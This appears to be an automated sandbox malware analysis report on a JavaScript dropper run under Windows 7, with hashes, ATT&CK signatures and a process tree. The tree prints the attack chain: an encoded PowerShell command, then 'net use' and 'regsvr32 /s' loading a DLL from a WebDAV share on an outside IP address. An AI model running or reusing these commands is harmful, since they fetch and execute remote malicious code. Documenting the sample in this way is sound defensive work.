Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 12:20

General

  • Target

    1688429849263022239.js

  • Size

    720KB

  • MD5

    6bb4dffdd348a4c3b1a2c22d6606e9f0

  • SHA1

    f5d7853b07bf571a3ef736552ac9e7af914ec0b3

  • SHA256

    99009e3c89f424fd01b517b2b644e587677c1bf42a3791d67ff8ec05e40eaace

  • SHA512

    0000104cbda57ff9bd5ba38a6676c570f766465ded5a51adbd95753ec9bb78e664d31d92f91d266b8db7cf800262d235a6fd80da44654399db710ed7cb540b2d

  • SSDEEP

    6144:I6G26HDfmyelKpU1lDA40K+SUbXeDA40K+SUbjTFrE1:ZG/TOKpU1+40K+SUbXR40K+SUbjTFrE1

Malware Config

Signatures

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\1688429849263022239.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA7AHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA0ADcAMQAyADAAMQA0ADIAMQA3ADQANwAuAGQAbABsAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" use \\94.159.113.79@8888\davwwwroot\
        3⤵
          PID:2812
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s \\94.159.113.79@8888\davwwwroot\218471201421747.dll
          3⤵
            PID:2316

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2544-4-0x000007FEF5EAE000-0x000007FEF5EAF000-memory.dmp

        Filesize

        4KB

      • memory/2544-5-0x000000001B660000-0x000000001B942000-memory.dmp

        Filesize

        2.9MB

      • memory/2544-6-0x0000000002890000-0x0000000002898000-memory.dmp

        Filesize

        32KB

      • memory/2544-7-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

        Filesize

        9.6MB

      • memory/2544-10-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

        Filesize

        9.6MB

      • memory/2544-9-0x0000000002C6B000-0x0000000002CD2000-memory.dmp

        Filesize

        412KB

      • memory/2544-8-0x0000000002C64000-0x0000000002C67000-memory.dmp

        Filesize

        12KB

      • memory/2544-11-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

        Filesize

        9.6MB